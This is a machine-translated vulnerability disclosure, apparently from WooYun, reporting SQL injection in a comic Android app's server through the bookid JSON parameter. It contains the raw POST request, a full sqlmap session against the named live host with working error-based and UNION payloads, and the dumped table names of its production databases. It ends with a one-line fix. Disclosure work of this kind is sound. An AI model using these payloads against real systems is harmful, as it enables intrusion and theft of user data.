Cartoon island Android app server SQL injection can cause user data and Server Information Leakage

Source: Internet
Author: User

Cartoon island Android app server SQL injection can cause user data and Server Information Leakage

Cartoon island Android app server SQL Injection
All user data and server information may be exposed.
Case Study of Automatic wooyun routing vulnerability discovery #01
How can I hit a vulnerability when I use wooyun route?

Problematic URL:/comic/comicsupdateinfo_sb

Question parameter (POST): bookid

Original request:


 

POST /comic/comicsupdateinfo_sb HTTP/1.1accept: */*connection: Keep-AliveContent-Type: application/x-www-form-urlencodedcharset: utf-8User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; A0001 Build/LMY48Y)Host: mhjk.1391.comAccept-Encoding: gzipContent-Length: 56[{"updatetime":"2016-01-21 00:00:00","bookid":"166465"}]



Problem description: The validity verification is not performed in the json bookid parameter, resulting in an SQL injection vulnerability and database data leakage.

Discovery process: the application is normally used under the wooyun router, and the burp report vulnerability is found. The vulnerability is submitted after being verified using SQLMAP. Only the data table name is obtained as a proof, without in-depth data theft.
 

 


 


 

[email protected]:~$ sqlmap -l 001 --tables         _ ___ ___| |_____ ___ ___  {1.0-dev-f54b25c}|_ -| . | |     | .'| . ||___|_  |_|_|_|_|__,|  _|      |_|           |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 18:22:24[18:22:24] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be testedURL 1:GET http://mhjk.1391.com:80/comic/comicsupdateinfo_sbPOST data: %5B%7B%22updatetime%22%3A%222016-01-21%2000%3A00%3A00%22%2C%22bookid%22%3A%22166465%2A%22%7D%5Ddo you want to test this URL? [Y/n/q]> y[18:22:26] [INFO] testing URL 'http://mhjk.1391.com:80/comic/comicsupdateinfo_sb'custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y[18:22:27] [INFO] using '/home/alkaid/.sqlmap/output/results-01232016_0622pm.csv' as the CSV results file in multiple targets mode[18:22:27] [INFO] testing connection to the target URL[18:22:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS[18:22:27] [INFO] testing if the target URL is stable[18:22:28] [INFO] target URL is stable[18:22:28] [INFO] testing if (custom) POST parameter '#1*' is dynamic[18:22:28] [WARNING] (custom) POST parameter '#1*' does not appear dynamic[18:22:29] [INFO] heuristics detected web page charset 'ascii'[18:22:29] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable[18:22:29] [INFO] testing for SQL injection on (custom) POST parameter '#1*'[18:22:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[18:22:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'[18:22:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'[18:22:29] [INFO] (custom) POST parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] yfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y[18:22:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[18:22:33] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[18:22:33] [INFO] target URL appears to be UNION injectable with 8 columns[18:22:34] [INFO] (custom) POST parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ysqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:---Parameter: #1* ((custom) POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: [{"updatetime":"2016-01-21 00:00:00","bookid":"166465') AND (SELECT 1617 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(1617=1617,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('azUG'='azUG"}]    Type: UNION query    Title: Generic UNION query (NULL) - 9 columns    Payload: [{"updatetime":"2016-01-21 00:00:00","bookid":"166465') UNION ALL SELECT CONCAT(0x71707a6a71,0x64674969486c6b76796567494d486f455443747975696171545466717153425a4c616a7a5a534f41,0x716b707871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"}]---do you want to exploit this SQL injection? [Y/n] y[18:22:43] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[18:22:43] [INFO] fetching database names[18:22:43] [INFO] fetching tables for databases: 'comic_biz, comic_library, comic_trade, information_schema, test'Database: comic_biz[95 tables]+---------------------------------------+| function                              || adgroup_info                          || admin_info                            || admin_log                             || adposition_info                       || album_bigbook_relation                || album_info                            || application                           || award_info                            || award_info_copy                       || bigbook_channel_relation              || bigbook_user_relation                 || blacklist_info                        || blacklist_info_copy                   || blog_at_relation                      || blog_info                             || blog_manage_log                       || blog_topic_relation                   || blogpic_info                          || blogpraise_info                       || blogrecommend_info                    || blogreply_info                        || book_channel_relation                 || bookpart_reading_log                  || channel_info                          || channel_tag_relation                  || community_info                        || community_section                     || community_section_user_relation       || config_info                           || cucc_order_info                       || cucc_user_info                        || discuss_error_info                    || discuss_extend_info                   || discuss_info                          || discuss_reply_adimgs_info             || discusspic                            || event_configs                         || feedback_info                         || filterwords_info                      || focuspicture_info                     || invitecode_info                       || invitecode_info_copy                  || iosdevice_info                        || jfq_iosdevice_info                    || keyword_info                          || list_bigbook_relation                 || page_discuss                          || page_discuss_extension                || picpackage                            || platform_version                      || praiseinfo                            || promotion_info                        || recommendauthor_info                  || recommendbook_info                    || recommendcategory_info                || recommendsubject_info                 || reply_info                            || role                                  || role_function_relation                || score_config                          || score_info                            || shop_info                             || special_bigbook_relation              || special_book_relation                 || special_description                   || special_info                          || subject_channel_relation              || t2                                    || tip_message_channel_relation          || tip_message_info                      || tip_messsage_plaform_version_relation || tmp_jfq                               || topic_info                            || tt                                    || user_expget_log                       || user_extend_info                      || user_info                             || user_invitecode_log                   || user_invitecode_log_copy              || user_login_log                        || user_reduce_log                       || user_role_relation                    || user_search_info                      || user_search_info_history              || user_token_info                       || useraward_log                         || useraward_log_copy                    || userawardnum_info                     || userfollow_info                       || version_info                          || wp_phone                              || wp_phone_book                         || wp_phone_push_log                     || znq_test                              |+---------------------------------------+Database: comic_library[44 tables]+---------------------------------------+| admin_info                            || author_info                           || bigbook_author_relation               || bigbook_book_relation                 || bigbook_info                          || bigbook_jingpin                       || book_author_relation                  || book_info                             || book_jingpin                          || book_message_filter                   || book_message_info                     || book_temp_message_info                || booksource_primer                     || bookupdate_info                       || cdn_page_info                         || cdn_part_info                         || domainconfig                          || lightbook                             || lightchapter                          || lightpart                             || message_template                      || page_info                             || page_size_info                        || part_info                             || part_test                             || sourcecomics_info                     || sourcecomics_info_relation            || sourcesbook_down                      || sourcesbook_downid                    || subject_info                          || tempexecute                           || test                                  || test_author                           || test_fan                              || test_sourceratio                      || test_top150                           || test_top500                           || test_zymk                             || tmp_cdnpart                           || toudi_account                         || toudi_partinfo                        || wp_phone                              || wp_phone_book                         || wp_phone_push_log                     |+---------------------------------------+Database: information_schema[40 tables]+---------------------------------------+| CHARACTER_SETS                        || COLLATIONS                            || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS                               || COLUMN_PRIVILEGES                     || ENGINES                               || EVENTS                                || FILES                                 || GLOBAL_STATUS                         || GLOBAL_VARIABLES                      || INNODB_BUFFER_PAGE                    || INNODB_BUFFER_PAGE_LRU                || INNODB_BUFFER_POOL_STATS              || INNODB_CMP                            || INNODB_CMPMEM                         || INNODB_CMPMEM_RESET                   || INNODB_CMP_RESET                      || INNODB_LOCKS                          || INNODB_LOCK_WAITS                     || INNODB_TRX                            || KEY_COLUMN_USAGE                      || PARAMETERS                            || PARTITIONS                            || PLUGINS                               || PROCESSLIST                           || PROFILING                             || REFERENTIAL_CONSTRAINTS               || ROUTINES                              || SCHEMATA                              || SCHEMA_PRIVILEGES                     || SESSION_STATUS                        || SESSION_VARIABLES                     || STATISTICS                            || TABLES                                || TABLESPACES                           || TABLE_CONSTRAINTS                     || TABLE_PRIVILEGES                      || TRIGGERS                              || USER_PRIVILEGES                       || VIEWS                                 |+---------------------------------------+Database: comic_trade[86 tables]+---------------------------------------+| attentive_prompt                      || book_chapter_discount_history         || book_chapter_price_history            || book_discount_history                 || book_price                            || book_price_history                    || channel_contract_history              || chapter_price                         || product_as_info                       || product_category_as_info              || product_discount_history              || product_duration_as_history           || product_info                          || product_price_history                 || sign_setting                          || sign_setting_as                       || system_account_as_history             || system_account_history                || user_account_as_info                  || user_account_info                     || user_deposit_as_history               || user_deposit_history                  || user_order_0                          || user_order_1                          || user_order_2                          || user_order_3                          || user_order_4                          || user_order_5                          || user_order_6                          || user_order_7                          || user_order_8                          || user_order_9                          || user_order_as_0                       || user_order_as_1                       || user_order_as_2                       || user_order_as_3                       || user_order_as_4                       || user_order_as_5                       || user_order_as_6                       || user_order_as_7                       || user_order_as_8                       || user_order_as_9                       || user_order_detail_0                   || user_order_detail_1                   || user_order_detail_2                   || user_order_detail_3                   || user_order_detail_4                   || user_order_detail_5                   || user_order_detail_6                   || user_order_detail_7                   || user_order_detail_8                   || user_order_detail_9                   || user_order_detail_as_0                || user_order_detail_as_1                || user_order_detail_as_2                || user_order_detail_as_3                || user_order_detail_as_4                || user_order_detail_as_5                || user_order_detail_as_6                || user_order_detail_as_7                || user_order_detail_as_8                || user_order_detail_as_9                || user_order_present_0                  || user_order_present_1                  || user_order_present_2                  || user_order_present_3                  || user_order_present_4                  || user_order_present_5                  || user_order_present_6                  || user_order_present_7                  || user_order_present_8                  || user_order_present_9                  || user_order_present_as_0               || user_order_present_as_1               || user_order_present_as_2               || user_order_present_as_3               || user_order_present_as_4               || user_order_present_as_5               || user_order_present_as_6               || user_order_present_as_7               || user_order_present_as_8               || user_order_present_as_9               || user_present_as_history               || user_present_history                  || vwIOSUserMonthlyOrder                 || vwUserMonthlyOrder                    |+---------------------------------------+[18:22:43] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 2 times[18:22:43] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/alkaid/.sqlmap/output/results-01232016_0622pm.csv'





Appendix: black cloud routing combined with the burp vulnerability prompt (then use sqlmap to test the vulnerability Hazard Based on the result)
 

 

Solution:

Filter two parameters in json

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.